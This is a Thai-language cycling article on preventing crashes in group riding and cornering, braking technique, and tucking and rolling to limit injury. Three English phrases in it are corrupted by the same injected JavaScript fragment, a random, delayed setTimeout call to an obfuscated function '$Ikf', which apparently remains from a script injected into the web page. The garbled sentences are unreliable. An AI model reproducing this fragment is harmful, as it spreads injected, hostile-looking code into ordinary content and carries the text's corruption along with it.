การป้องกันการล้ม (Bicycle crash prevention) และล้มอย่างไรไม่ให้เจ็บหนัก (Minimize damage)
เราจะมาพูดถึงหัวข้อการป้องกันไม่ให้เกิดการล้มและเมื่อเกิดการล้ม ต้องล้มอย่างไรให้เจ็บตัวน้อยที่สุด และสถานที่ที่สุ่มเสี่ยงต่อการล้มมากที่สุดคือ การปั่นเป็นกลุ่มและการเข้าโค้ง
เราไม่สามารถทำนายเหตุการณ์ล่วงหน้าได้ ไม่ว่าจะออกทริปไปกับก๋วนที่สนิทกันมากคาไหน แต่โอกาสล้มก็เกิดขึ้นได้เสมอ ดังนั้นสิ่งที่เราควรทำเมื่อต้องออกทริปปั่นเป็นกลุ่มคือเช็คอุปกรณ์และจักรยาน นักปั่นที่ดีต้องหมั่นตรวจเช็ครถจักรยานของตัวเองให้อยูในสภาพพร้อมใช้งานได้เสมอ อย่างเช่น ระบบเบรค เกียร์ สภาพเฟรม ล้อ และอย่าลืมสวมหมวกกันน็อคทุกครั้งก่อนปั่น ขณะออกสนามต้องสังเกตสภาพแวดล้อม อย่างเช่น สภาพการจราจร คน รถยนต์ มอเตอร์ไซด์และจักรยานด้วยกัน (Traffic andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and road condition) คนหน้าต้องค่อยส่งสัญญามือให้กับลูกทีมด้วย
เรามาดูเทคนิคควรรู้เพื่อลดความเสี่ยงที่จะกันนะครับ
1. เทคนิคการปั่นเป็นกลุ่ม
ห้ามทำ Overlap wheel เด็ดขาด เพราะถ้าคนข้างหน้าเปลี่ยนทิศทาง ล้อหลังของเขาจะกระทบล้อหน้าเรา ทำให้เกิดการล้มลงได้ และที่ร้ายแรงคือเราจะทำให้คนตามหลังเราอาจจะทั้งหมดล้มไปด้วย แต่ถ้าใครที่ปฎิกิริยาดีอาจจะหลบหลีกได้ทันก็รอดตัวไป


เมื่อเราล้มจะไปเกี่ยวเอาคนข้างหลังล้มลงไปด้วย

Avoid unsafe rider หรือพยายามหลบหลีกนักปั่นที่มีพฤติกรรมสุ่มเสี่ยงต่อการทำให้เกิดอุบัติเหตุ มีวิธีการปั่นที่ประเมินแล้วว่าอันตรายต่อเรา อย่างเช่น ขับรถส่ายไปมา ไม่มีสมาธิต่อการปั่น ใส่หูฟัง ให้รีบแซงหน้าไปเลยครับ
Second crash syndrome เป็นการล้มจากการขาดสมาธิในการปั่นระยะสั้นๆ เราควรจะจดจ่อต้องเส้นทางและสิ่งกีดขวางที่อยู่ตรงหน้า แต่เพราะมีการล้มเกิดขึ้นข้างหลังกลุ่มเรา ทำให้เราละสายตาไม่เพียงกี่วินาทีเพื่อเหลี่ยวหลังกลับไม่มองว่าเกิดอะไรขึ้น ช่วงเวลานี้เขาเรียกว่า Lapse in attention ช่วงนี้เองเราจะสูญเสียการควบคุมทิศทางของจักรยาน ซึ่งอาจจะไปกระทบกับเพื่อนในกลุ่ม หรือถ้าเพื่อนเหลี่ยวหลังมองเหมือนกันเค้าก็อาจจะมาเกี่ยวเราล้มไปด้วย หรืออาจจะเกิดเพราะทั้งเราและเพื่อนเหลี่ยวหลังไปมองพร้อมๆ กัน


การละสายตาไม่กี่วินาที ก็สามารถทำให้เราสูญเสียการควบคุมทิศทางได้ รถส่ายไปมา

ดังนั้นหายเกิดเหตุการณ์ใดๆ ขึ้นข้างหลังให้ปั่นไปก่อนไม่ต้องมองย้อนหลัง ค่อยๆ ผ่อนความเร็วแล้จอดดู (Don’t look back andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and keep going)

2. การเข้าโค้ง เป็นหนึ่งในสาเหตุหลักของการล้ม และเพื่อป้องกันการล้มเรามาดูเทคนิคเบื้องต้นกัน…
1. Point of focus และ Focus through the corner ต้องมีสติและโฟกัสจุดเข้าโค้งทุกครั้ง มองไปที่เป้าหมายหรือจุดที่เราจะเลี้ยวเข้าไป จะช่วยให้ควบคุมได้ง่ายขึ้น
2. ถ่ายน้ำหนักให้อยู่บนล้อ เวลาเลี้ยวให้เอนตัว (Lean) โดยที่ศูนย์กลางน้ำหนักยังอยู่บนล้อ จะช่วยเพิ่มแรงยึดกาะ (Traction)
3. เบรคก่อนเข้าโค้ง แตะเบรคชะลอความเร็วก่อนเข้าโค้ง หรือใช้เบรคเมื่ออยู่ในเส้นทางตรง การเบรคขณะเข้าโค้งจะเสี่ยงต่อการล้มมากเพราะ เวลาที่เราเบรคแรงเฉื่อยจะพุ่งไปข้างหน้าส่งผลให้ล้มหน้ารับแรงกดมากขึ้นหรือเพิ่ม Traction ยากต่อการควบคุม ทำให้ล้อหน้าไถล่ออกข้างได้

4. การใช้เบรค อย่างที่เรารู้ๆ กัน เบรคหน้าจะมีแรงเบรคมากกว่า (more stopping power) แต่การใช้เบรคหน้าจะทำให้ล้อหลังลอยได้ (unweight the rear wheel) ล้อหลังจะส่ายไปมาหรือเกิดอาการ Skidding ได้ หากบีบล้อหลังแรงเกินไปก็เช่นกัน ในกรณีที่รุนแรงหากเราบรคหน้าอย่างแรงจะตีลังการหายหลังได้
ฉะนั้นเวลาเบรคให้ใช้ทั้งเบรคหน้าและหลัง พร้อมกับถ่ายน้ำหนักไปข้างหลัง เพื่อ traction รักษาสมดุลและคอนโทรล
ในกรณีฉุกเฉินให้ใช้แรงเบรคหน้า 60% และเบรคหลัง 40% และถ้าต้องปั่นในวันฝนตกหรือถนนเปียก ให้ลดยางลมลง จะช่วยเพิ่ม traction ให้กับล้อ และหลีกเลี่ยงการขี่บนเส้นขาวที่ขีดแบบเลนถนนไว้เพราะมันลื่นมาก
ต่อมาเรามาดูวิธีการลดการบาดเจ็บ (Minimize the damages) และหนึ่งในวิธีการผ่อนหนักให้เป็นเบาที่ง่ายที่สุด คือการฝึก Physical training อย่างเช่น การฝึกความยืดหยุ่น (Flexibility), การฝึกสมดุลทั้งซีกซ้ายขวา (Balance) และการฝึกประสาทรับรู้ให้ว่องไว (proprioception) การฝึกทั้งหมดนี้จะช่วยเพิ่มเวลาตอบสนองและการคอนโทรลต่อสถานการณ์ที่เกิดขึ้นได้รวดเร็วขึ้น
อย่างไรก็ตามเมื่อต้องเผชิญกับสถานะการณ์ที่ไม่สามารถหลีกเลี่ยงได้ หรือเราต้องล้มจริงๆ
Over the bars เหตุการณ์ที่เราล้มพุ่งไปข้างหน้า หรือตีลังกาไปข้างหน้า อาจจะเพราะเราเบรคหน้าอย่างแรง หรือชนเข้ากับสิ่งกีดขว้างด้านหน้าทำให้ตัวและล้อหลังยกขึ้น
วิธีที่จะช่วยลดแรงกระแทกและความเสียหายที่จะเกิดขึ้นคือ Tuck andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and Roll ให้เก็บหัว มือยังอยู่ที่แฮนด์บาร์ พยายามจินตนาการให้ม้วนตัวล้มลง
ฟังดูเหมือนจะง่ายนะครับ แต่ในเหตุการณ์จริงๆ มันต้องขึ้นอยู่กับการตอบสนองหรือสัญชาตญาณของเรา ซึ่งส่วนมากการตอบสนองจะโดยสัญชาตญาณจะทำให้เราปล่อยมือออกจากแฮนด์บาร์ ทำให้เจ็บหนักกว่าเดิมครับ อาจจะมีหน้าแหกและแขนหัก
และการเข้าโค้งก็เหมือนกัน หากเราต้องล้มลงให้เก็บมือเข้าตัว และกลิ้งตัวถ้าทำได้
หวังว่าทุกผู้อ่านคงได้ความรู้ไปกับข้อนี้ไม่มากก็น้อยนะครับ และก่อนปั่นต้องตั้งสติและมีสมาธิทุกครั้งนะครับ
ที่มาCyclingSecrets